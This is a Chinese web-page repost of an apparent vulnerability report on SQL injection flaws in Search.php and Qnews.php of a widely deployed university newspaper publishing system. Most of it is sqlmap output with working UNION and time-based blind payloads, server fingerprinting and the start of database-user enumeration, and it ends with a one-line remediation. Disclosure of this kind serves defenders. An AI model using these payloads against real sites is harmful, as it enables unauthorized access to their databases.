网站地图    收藏   

主页 > 后端 > 网站安全 >

某通用型大学校报发布系统注入漏洞 - 网站安全

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] Search php文件:GhostAsp参数过滤不严厉,直接带入了查询。Qnews php文件:ID参数过滤不严,直接带入差。---Place: GETParameter: GhostAsp Type: UNION query Title: MySQL UNION query...

Search.php文件:




GhostAsp参数过滤不严厉,直接带入了查询。



Qnews.php文件:

ID参数过滤不严,直接带入差。
 

---
Place: GET
Parameter: GhostAsp
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: LM=Newspaper&Key=1&GhostAsp=Title UNION ALL SELECT CONCAT(0x7172746871,0x616874524d526d64634e,0x7177787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&BtnSearch= 

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: LM=Newspaper&Key=1&GhostAsp=Title AND SLEEP(5)&BtnSearch= 
---
[17:01:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.8
back-end DBMS: MySQL 5.0.11
[17:01:44] [INFO] fetching database users


 

QQ图片20140707174919.jpg



案例还是蛮多的啦。

就不一一测试了。
 

修复方案:

过滤哦,亲~

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论